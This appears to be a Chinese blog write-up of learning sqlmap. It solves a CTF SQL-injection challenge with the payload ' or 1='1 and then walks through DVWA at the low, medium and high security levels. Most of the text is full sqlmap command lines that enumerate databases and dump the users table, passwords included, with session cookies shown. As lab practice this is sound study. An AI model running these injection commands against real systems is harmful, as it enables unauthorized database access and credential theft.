一些sqlmap的命令，留着备用：https://www.freebuf.com/sectool/164608.html
感觉这篇教程也不错：https://www.cnblogs.com/im404/p/3505894.html
命令合集：https://www.jianshu.com/p/fa77f2ed788b

在学习这个工具的时候我试着做了一下平台上一道题：

image

一开始一直没找到注入点，直到试了一下万能密码，发现可行：

image

image

首先列举数据库：

C:\Users\Virtual Address\sqlmap>python sqlmap.py -u "http://47.105.148.65:49176/index.php?submit=%27+or+1%3D%271" --dbs

image

image

可以发现一共有4个可用的数据库。
friend数据库有些可疑，列举这个数据库的表名：

C:\Users\Virtual Address\sqlmap>python sqlmap.py -u "http://47.105.148.65:49176/index.php?submit=%27+or+1%3D%271" -D friend --tables

image

发现了一个名为xiaohong的表，而题目中提示“小红不在同学名单里”，所以接下来获取xiaohong这个表的列名：

C:\Users\Virtual Address\sqlmap>python sqlmap.py -u "http://47.105.148.65:49176/index.php?submit=%27+or+1%3D%271" -D friend -T xiaohong --columns

image

发现表中有3个字段：id，name，sign，接着爆字段：

C:\Users\Virtual Address\sqlmap>python sqlmap.py -u "http://47.105.148.65:49176/index.php?submit=%27+or+1%3D%271" -D friend -T xiaohong -C "id,name,sign" --dump

image

顺利拿到了flag。

image

接下来测试一下DVWA的SQL注入漏洞。

image

首先是low级别。

写点东西提交一下，找到注入点，先只使用url试一下：

C:\Users\Virtual Address\sqlmap>python sqlmap.py -u "http://192.168.113.128/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#"

image

有个302跳转，查了查应该是需要带上cookie。
带上cookie试一试：

C:\Users\Virtual Address\sqlmap>python sqlmap.py -u "http://192.168.113.128/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=ui1cu2ri50j8uv993u4rto58p1"

image

接下来列举数据库（偷了个懒用了--batch参数）：

C:\Users\Virtual Address\sqlmap>python sqlmap.py -u "http://192.168.113.128/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=ui1cu2ri50j8uv993u4rto58p1" --batch --dbs

image

可以看到有8个可用的数据库。

接下来列举dvwa数据库中所有的表：

C:\Users\Virtual Address\sqlmap>python sqlmap.py -u "http://192.168.113.128/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=ui1cu2ri50j8uv993u4rto58p1" --batch -D dvwa --tables

image

一共有两个表。

获取表users的列名：

C:\Users\Virtual Address\sqlmap>python sqlmap.py -u "http://192.168.113.128/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=ui1cu2ri50j8uv993u4rto58p1" --batch -D dvwa -T users --columns

image

一共8列。
最后爆字段：

C:\Users\Virtual Address\sqlmap>python sqlmap.py -u "http://192.168.113.128/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=ui1cu2ri50j8uv993u4rto58p1" --batch -D dvwa -T users -C "user,avatar,first_name,last_name,password,user_id" --dump

这一步有些慢，但最终成功得到了数据：

image

接下来尝试medium级别。

在medium级别下，输入框被改成了下拉菜单，请求方式变成了post。

image

查了一下资料，发现这个级别也是可以使用sqlmap进行注入的，只不过命令要改成：

C:\Users\Virtual Address\sqlmap>python sqlmap.py -u "http://192.168.113.128/dvwa/vulnerabilities/sqli/" --cookie="security=medium; PHPSESSID=ui1cu2ri50j8uv993u4rto58p1" --data "id=1&Submit=Submit"

参考资料：https://blog.csdn.net/monsterdouble/article/details/80818675

image

接下来的步骤与low级别几乎完全相同：

爆库：

C:\Users\Virtual Address\sqlmap>python sqlmap.py -u "http://192.168.113.128/dvwa/vulnerabilities/sqli/" --cookie="security=medium; PHPSESSID=ui1cu2ri50j8uv993u4rto58p1" --data "id=1&Submit=Submit" --batch --dbs

image

爆表：

C:\Users\Virtual Address\sqlmap>python sqlmap.py -u "http://192.168.113.128/dvwa/vulnerabilities/sqli/" --cookie="security=medium; PHPSESSID=ui1cu2ri50j8uv993u4rto58p1" --data "id=1&Submit=Submit" --batch -D dvwa --tables

image

爆字段：

C:\Users\Virtual Address\sqlmap>python sqlmap.py -u "http://192.168.113.128/dvwa/vulnerabilities/sqli/" --cookie="security=medium; PHPSESSID=ui1cu2ri50j8uv993u4rto58p1" --data "id=1&Submit=Submit" --batch -D dvwa -T users -C "user,first_name,last_name,password,user_id" --dump

image

最后是high级别（貌似impossible用sqlmap搞不了）：

image

high提交查询和显示结果的页面不是一个，与medium相比发生了很大变化，据说这样做是为了防止sqlmap这样的自动化工具的扫描测试。
但是，仍然可以用sqlmap进行注入，只不过需要改变一下方法：

C:\Users\Virtual Address\sqlmap>python sqlmap.py -u "http://192.168.113.128/dvwa/vulnerabilities/sqli/session-input.php" --data="id=1&Submit=Submit" --cookie="security=high; PHPSESSID=ui1cu2ri50j8uv993u4rto58p1" --batch --second-url="http://192.168.113.128/dvwa/vulnerabilities/sqli/"

参考资料：https://www.jianshu.com/p/e263ea40fe25
注：参考资料里的--second-order似乎已经无法使用了，但是可以使用--second-url替代

成功检测到了注入点：

image

接下来的步骤就和前两个级别差不多了：

爆库：

C:\Users\Virtual Address\sqlmap>python sqlmap.py -u "http://192.168.113.128/dvwa/vulnerabilities/sqli/session-input.php" --data="id=1&Submit=Submit" --cookie="security=high; PHPSESSID=ui1cu2ri50j8uv993u4rto58p1" --batch --second-url="http://192.168.113.128/dvwa/vulnerabilities/sqli/" --dbs

image

爆表：

C:\Users\Virtual Address\sqlmap>python sqlmap.py -u "http://192.168.113.128/dvwa/vulnerabilities/sqli/session-input.php" --data="id=1&Submit=Submit" --cookie="security=high; PHPSESSID=ui1cu2ri50j8uv993u4rto58p1" --batch --second-url="http://192.168.113.128/dvwa/vulnerabilities/sqli/" -D dvwa --tables

image

获取列名（测试medium级别时漏了这一步）：

C:\Users\Virtual Address\sqlmap>python sqlmap.py -u "http://192.168.113.128/dvwa/vulnerabilities/sqli/session-input.php" --data="id=1&Submit=Submit" --cookie="security=high; PHPSESSID=ui1cu2ri50j8uv993u4rto58p1" --batch --second-url="http://192.168.113.128/dvwa/vulnerabilities/sqli/" -D dvwa -T users --columns

image

爆字段：

C:\Users\Virtual Address\sqlmap>python sqlmap.py -u "http://192.168.113.128/dvwa/vulnerabilities/sqli/session-input.php" --data="id=1&Submit=Submit" --cookie="security=high; PHPSESSID=ui1cu2ri50j8uv993u4rto58p1" --batch --second-url="http://192.168.113.128/dvwa/vulnerabilities/sqli/" -D dvwa -T users -C "user,first_name,last_name,password,user_id" --dump

image